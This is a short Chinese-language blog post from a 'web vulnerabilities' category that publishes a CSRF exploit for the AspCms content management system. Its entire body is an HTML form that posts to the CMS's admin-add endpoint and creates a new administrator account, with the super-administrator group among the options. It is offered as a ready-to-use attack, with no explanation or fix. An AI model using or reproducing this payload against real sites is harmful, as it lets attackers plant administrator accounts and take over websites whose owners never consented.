aspcmsCSRF漏洞利用exp

作者:小俊 分类: WEB漏洞大全 发布于:2020-3-3 19:10 ė289次浏览 60条评论

exp:<FORM name="form" action="https://www.0dayhack.com/admin_aspcms/_user/_Admin/AspCms_AdminAdd.asp?action=add" method="post" > <TD align=middle width=100 height=30>管理员组</TD> <select name="GroupID" id="GroupID"> <option value="1" >超级管理员组</option> <option value="6" >lpyuan</option> <option value="5" >普通管理员</option> </select> <TD align=middle width=100 height=30>管理员名称</TD> <INPUT class="input" style="FONT-SIZE: 12px; WIDTH: 300px" maxLength="200" name="LoginName"/> <TD align=middle width=100 height=30>管理员密码</TD> <INPUT type="Password" class="input" style="FONT-SIZE: 12px; WIDTH: 300px" maxLength="200" name="Password"/> <TD align=middle width=100 height=30>管理员描述</TD> <INPUT class="input" style="FONT-SIZE: 12px; WIDTH: 300px" maxLength="200" name="AdminDesc"/> <TD align=middle width=100 height=30>状态</TD> <INPUT class="checkbox" type="checkbox" name="UserStatus" checked="checked" value="1"/> <INPUT class="button" type="submit" value="添加" /> </FORM>


本文出自 小俊博客,转载时请注明出处及相应链接。

0

发表评论

电子邮件地址不会被公开。必填项已用*标注


Ɣ回顶部